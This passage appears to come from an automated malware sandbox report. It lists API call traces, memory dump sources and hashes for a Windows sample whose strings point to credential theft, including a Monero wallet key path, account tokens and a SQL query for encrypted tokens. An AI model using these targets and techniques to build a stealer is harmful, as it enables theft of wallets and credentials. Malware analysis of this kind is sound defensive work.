                  • InternetCloseHandle.WININET(00000000), ref: 00C06260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 8c3ec437fd7fc7cffafe072c4d79097a07da0be872e0c2bc870a695f36ab6a5b
                  • Instruction ID: ae918732bd8c7a5c93bed8bc0ab1145613dbc0e1091be7e31581e7abe9d0557d
                  • Opcode Fuzzy Hash: 8c3ec437fd7fc7cffafe072c4d79097a07da0be872e0c2bc870a695f36ab6a5b
                  • Instruction Fuzzy Hash: 885170B1940218AFEB20DF51DC49BEE77B8EB05701F1080A9B605B71C0DB74AB8ADF95
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  • lstrlen.KERNEL32(00000000), ref: 00C0BC9F
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C0BCCD
                  • lstrlen.KERNEL32(00000000), ref: 00C0BDA5
                  • lstrlen.KERNEL32(00000000), ref: 00C0BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 4d084711818c7970918d6e3f2996cba73829fc72b98648995422bdc78b8180ed
                  • Instruction ID: 10103cb62f0e0c43d6db231c837e1430934d105087352154a501841d281bdfe7
                  • Opcode Fuzzy Hash: 4d084711818c7970918d6e3f2996cba73829fc72b98648995422bdc78b8180ed
                  • Instruction Fuzzy Hash: B5B17F719111089BDB04FBA0DD96EEE7339AF55310F444168F506B21D1EF34AE8AFBA2
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: aea36bbf646fea87de88538d9441171b9e7a9d9034b8fe80538b958d0bbb7e86
                  • Instruction ID: a2afc6755811872f602b113ef4d4c095a93b8197caf56895ed9810679baaf6e9
                  • Opcode Fuzzy Hash: aea36bbf646fea87de88538d9441171b9e7a9d9034b8fe80538b958d0bbb7e86
                  • Instruction Fuzzy Hash: 37F03A34984209EFE3549FE2E90D76C7BB0FB06712F0801AAF709A62D0D6704B42DB96
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C04FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C04FD1
                  • InternetOpenA.WININET(00C20DDF,00000000,00000000,00000000,00000000), ref: 00C04FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00C05011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00C05041
                  • InternetCloseHandle.WININET(?), ref: 00C050B9
                  • InternetCloseHandle.WININET(?), ref: 00C050C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: bc30e2f25af20b0fa93e4d793a37b8ff4b87b10f8026f3e7efe45ff040a42f10
                  • Instruction ID: 3c353db78bffac3a201735eeb2fb171a3683442632b48b22f7208c16993cbec2
                  • Opcode Fuzzy Hash: bc30e2f25af20b0fa93e4d793a37b8ff4b87b10f8026f3e7efe45ff040a42f10
                  • Instruction Fuzzy Hash: D731F8B4A40218ABDB20CF55DC89BDDB7B4EB48704F1081E9E609B7281D7706AC6CF99
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C18426
                  • wsprintfA.USER32 ref: 00C18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C18499
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0179E470,00000000,000F003F,?,00000400), ref: 00C184EC
                  • lstrlen.KERNEL32(?), ref: 00C18501
                  • RegQueryValueExA.ADVAPI32(00000000,0179E6A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C20B34), ref: 00C18599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C18608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C1861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 09593343820c23add332cf18f4df0d542cbb9074e668681ca389a90998ea2b65
                  • Instruction ID: 097ae221ea3ae8029aeb36aa776cbcd3a6f66074075c3137e7579e22074c1fca
                  • Opcode Fuzzy Hash: 09593343820c23add332cf18f4df0d542cbb9074e668681ca389a90998ea2b65
                  • Instruction Fuzzy Hash: 72210A759402189FDB24DB54DC85FE9B3B8FB48710F04C1E9A609A6180DF71AA86CFD4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C176A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C176AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0178C538,00000000,00020119,00000000), ref: 00C176DD
                  • RegQueryValueExA.ADVAPI32(00000000,0179E458,00000000,00000000,?,000000FF), ref: 00C176FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00C17708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: a368fa4ddb1c0ae134585b3ce4d68607ab09a80155098fc109064de91ee7e7d6
                  • Instruction ID: 5d1837e862b8d671380b5efd072af045c4bbefc311e05be2c6891d9b146694ad
                  • Opcode Fuzzy Hash: a368fa4ddb1c0ae134585b3ce4d68607ab09a80155098fc109064de91ee7e7d6
                  • Instruction Fuzzy Hash: 9C0184B9A40204BFEB10DBE1DC4DFAD77BCEB09710F144165FA04E7290D67099459B51
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C1773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0178C538,00000000,00020119,00C176B9), ref: 00C1775B
                  • RegQueryValueExA.ADVAPI32(00C176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00C1777A
                  • RegCloseKey.ADVAPI32(00C176B9), ref: 00C17784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 2cd9ab0d7e9cbf1fae171ff2d1fe3223bca6396a9173de5f0ad40ae8d15c1a75
                  • Instruction ID: f71fa32e7fe2704683808868847c2a18a4d24462fa6aa768d69ca7c6df283732
                  • Opcode Fuzzy Hash: 2cd9ab0d7e9cbf1fae171ff2d1fe3223bca6396a9173de5f0ad40ae8d15c1a75
                  • Instruction Fuzzy Hash: 730144B9A40308BFE710DBE1DC4AFAEB7B8EB49710F104165FA05A7281D67056459F51
                  APIs
                  • memset.MSVCRT ref: 00C140D5
                  • RegOpenKeyExA.ADVAPI32(80000001,0179DC00,00000000,00020119,?), ref: 00C140F4
                  • RegQueryValueExA.ADVAPI32(?,0179EB58,00000000,00000000,00000000,000000FF), ref: 00C14118
                  • RegCloseKey.ADVAPI32(?), ref: 00C14122
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14147
                  • lstrcat.KERNEL32(?,0179EB28), ref: 00C1415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: ae15578b6f3369e832daa6541a55b6773caca0fef2a878bb13aeca6d87f6dadc
                  • Instruction ID: e39e842f9667e8e5de719480479b2e2e80cf5daa6756405f472ed04bfb5ef73c
                  • Opcode Fuzzy Hash: ae15578b6f3369e832daa6541a55b6773caca0fef2a878bb13aeca6d87f6dadc
                  • Instruction Fuzzy Hash: 0541E8BAD401086BDB24EBA0DC46FFE733DAB89300F044558B615571C1EA755B8DDBD2
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                  • LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 170b48d19cc0e637c8c41f76cefed7baa3aac2d2b897615e0c91d774d3f5b28e
                  • Instruction ID: 81d49d931c55c1f1a39ff6c37f7af440e6d83e3cf0b433a664505e478632946d
                  • Opcode Fuzzy Hash: 170b48d19cc0e637c8c41f76cefed7baa3aac2d2b897615e0c91d774d3f5b28e
                  • Instruction Fuzzy Hash: 84316BB4A00209EFDB14CF95C889BEEB7B5FF49310F108158E911A72D0C778AA85DFA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: fb93dbf6f71089481f6530b6a99c9774677b8b197c0db6c208876dbfd24740ae
                  • Instruction ID: 03f4f825a75606a1af75f11d318414746bfb52f2b90ee38235df7fc4d745e611
                  • Opcode Fuzzy Hash: fb93dbf6f71089481f6530b6a99c9774677b8b197c0db6c208876dbfd24740ae
                  • Instruction Fuzzy Hash: 194105B114075C9EDB218B248CC4FFBBBE89F06304F1444A8E99A86182D2719B85EF60
                  APIs
                  • lstrcat.KERNEL32(?,0179E718), ref: 00C147DB
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14801
                  • lstrcat.KERNEL32(?,?), ref: 00C14820
                  • lstrcat.KERNEL32(?,?), ref: 00C14834
                  • lstrcat.KERNEL32(?,0178BAA0), ref: 00C14847
                  • lstrcat.KERNEL32(?,?), ref: 00C1485B
                  • lstrcat.KERNEL32(?,0179D9C0), ref: 00C1486F
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C18D90: GetFileAttributesA.KERNEL32(00000000,?,00C01B54,?,?,00C2564C,?,?,00C20E1F), ref: 00C18D9F
                    • Part of subcall function 00C14570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C14580
                    • Part of subcall function 00C14570: RtlAllocateHeap.NTDLL(00000000), ref: 00C14587
                    • Part of subcall function 00C14570: wsprintfA.USER32 ref: 00C145A6
                    • Part of subcall function 00C14570: FindFirstFileA.KERNEL32(?,?), ref: 00C145BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: c1652d87121ef7bc2cdd728ed395ff3130e515287b07cd48a23b6106b1e3984c
                  • Instruction ID: 3d3f446205ddee2a424419bcf82f68a706cb70f61b29a024f7e225c2d3bd889e
                  • Opcode Fuzzy Hash: c1652d87121ef7bc2cdd728ed395ff3130e515287b07cd48a23b6106b1e3984c
                  • Instruction Fuzzy Hash: 2531A2BAD402086BDB14FBB0DC86EED737CAB49700F444598B319A6081EE7097CDEB95
                  APIs
